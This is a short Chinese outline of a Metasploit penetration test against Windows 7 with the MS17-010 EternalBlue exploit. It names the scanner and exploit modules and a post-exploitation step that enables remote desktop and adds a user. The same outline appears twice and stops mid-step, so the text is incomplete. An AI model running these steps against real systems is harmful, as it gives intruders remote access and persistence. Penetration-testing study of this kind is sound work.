msf通过win7“ms17-010:永恒之蓝”进行渗透测试
一.查找该漏洞
二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010
),对目标主机进行‘是否存在该漏洞’的检查
三.使用该漏洞的攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue
)
四.创建新用户,并进行远程连接(方法一)
使用enable_rdp脚本开启远程桌面并创建用户
1.开启远程桌面:run post/windows/manage/enable_rdp
msf通过win7“ms17-010:永恒之蓝”进行渗透测试
一.查找该漏洞
二.使用该漏洞的探测模块(auxiliary/scanner/smb/smb_ms17_010
),对目标主机进行‘是否存在该漏洞’的检查
三.使用该漏洞的攻击模块进行攻击(use exploit/windows/smb/ms17_010_eternalblue
)
四.创建新用户,并进行远程连接(方法一)
使用enable_rdp脚本开启远程桌面并创建用户
1.开启远程桌面:run post/windows/manage/enable_rdp